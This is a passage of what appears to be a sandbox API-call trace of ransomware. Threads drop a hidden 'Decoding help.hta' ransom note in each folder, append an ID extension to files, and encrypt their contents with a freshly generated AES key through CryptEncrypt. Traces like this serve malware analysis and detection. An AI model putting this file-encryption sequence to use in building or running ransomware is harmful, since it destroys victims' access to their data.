ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b5a8 [0061.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.344] FindNextFileW (in: hFindFile=0x10a4b5a8, lpFindFileData=0x2444fd30 | out: lpFindFileData=0x2444fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a89bd50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d1db890, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.344] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.344] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.344] FindNextFileW (in: hFindFile=0x10a4b5a8, lpFindFileData=0x2444fd30 | out: lpFindFileData=0x2444fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xf82, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.344] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*" [0061.344] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\*.*") returned 72 [0061.344] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\Decoding help.hta" [0061.344] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\decoding help.hta")) returned 0xffffffff [0061.344] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.686] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2444fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2444fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.686] CloseHandle (hObject=0xe6c) returned 1 [0061.686] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 815 os_tid = 0x204 [0054.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*", lpFindFileData=0x2555fd30 | out: lpFindFileData=0x2555fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da3f8 [0056.843] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.843] FindNextFileW (in: hFindFile=0x5da3f8, lpFindFileData=0x2555fd30 | out: lpFindFileData=0x2555fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.843] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.843] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.843] FindNextFileW (in: hFindFile=0x5da3f8, lpFindFileData=0x2555fd30 | out: lpFindFileData=0x2555fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.843] lstrcpyW (in: lpString1=0x979a3d8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*" [0056.843] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*") returned 63 [0056.843] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Decoding help.hta" [0056.843] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\decoding help.hta")) returned 0xffffffff [0056.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaf4 [0058.324] WriteFile (in: hFile=0xaf4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2555fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2555fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.325] CloseHandle (hObject=0xaf4) returned 1 [0058.325] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.325] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.325] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.325] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*" [0058.325] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\*.*") returned 63 [0058.325] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" [0058.325] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" [0058.325] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.326] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sl_SI\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sl_si\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaf4 [0058.326] CreateFileMappingA (hFile=0xaf4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xaf8 [0058.326] CryptAcquireContextA (in: phProv=0x2555fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2555fcec*=0x2aac5450) returned 1 [0060.199] CryptGenKey (in: hProv=0x2aac5450, Algid=0x6610, dwFlags=0x1, phKey=0x2555fce8 | out: phKey=0x2555fce8*=0x5fca120) returned 1 [0060.199] CryptExportKey (in: hKey=0x5fca120, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2555fbe4, pdwDataLen=0x2555fce4 | out: pbData=0x2555fbe4*, pdwDataLen=0x2555fce4*=0x2c) returned 1 [0060.199] MapViewOfFile (hFileMappingObject=0xaf8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.163] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2555fbe4*, pdwDataLen=0x2555fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2555fbe4*, pdwDataLen=0x2555fcf8*=0x100) returned 1 [0064.164] CryptEncrypt (in: hKey=0x5fca120, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2555fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2555fce4*=0x140) returned 1 [0064.164] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.166] CloseHandle (hObject=0xaf8) returned 1 [0064.166] CryptDestroyKey (hKey=0x5fca120) returned 1 [0064.166] CryptReleaseContext (hProv=0x2aac5450, dwFlags=0x0) returned 1 [0064.166] SetFilePointerEx (in: hFile=0xaf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.166] WriteFile (hFile=0xaf4, lpBuffer=0x2555fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2555fcf8, lpOverlapped=0x0) Thread: id = 816 os_tid = 0x8a4 [0054.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*", lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81886ddd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81886ddd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5a70 [0056.273] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.274] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81886ddd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81886ddd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.277] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.277] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd699b5c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbd699b5c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbd699b5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.png", cAlternateFileName="")) returned 1 [0056.671] lstrcpyW (in: lpString1=0x2ab11098, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0056.671] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0056.671] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0056.671] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0058.229] WriteFile (in: hFile=0x414, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2569fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2569fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.230] CloseHandle (hObject=0x414) returned 1 [0058.230] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.230] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1.png") returned 1 [0058.230] lstrlenW (lpString="1.png") returned 5 [0058.230] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0058.230] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0058.230] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="1.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" [0058.230] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" [0058.230] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.086] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc00d2b2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc00d2b2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd699b5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.png", cAlternateFileName="")) returned 1 [0059.086] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.086] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.086] lstrcmpiW (lpString1="Decoding help.hta", lpString2="10.png") returned 1 [0059.086] lstrlenW (lpString="10.png") returned 6 [0059.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.086] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="10.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" [0059.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" [0059.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.430] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc00d2b2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc00d2b2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd6bfcbc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.png", cAlternateFileName="")) returned 1 [0059.430] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.430] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.430] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.431] lstrcmpiW (lpString1="Decoding help.hta", lpString2="11.png") returned 1 [0059.431] lstrlenW (lpString="11.png") returned 6 [0059.431] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.431] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.431] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="11.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" [0059.431] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png" [0059.431] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]" 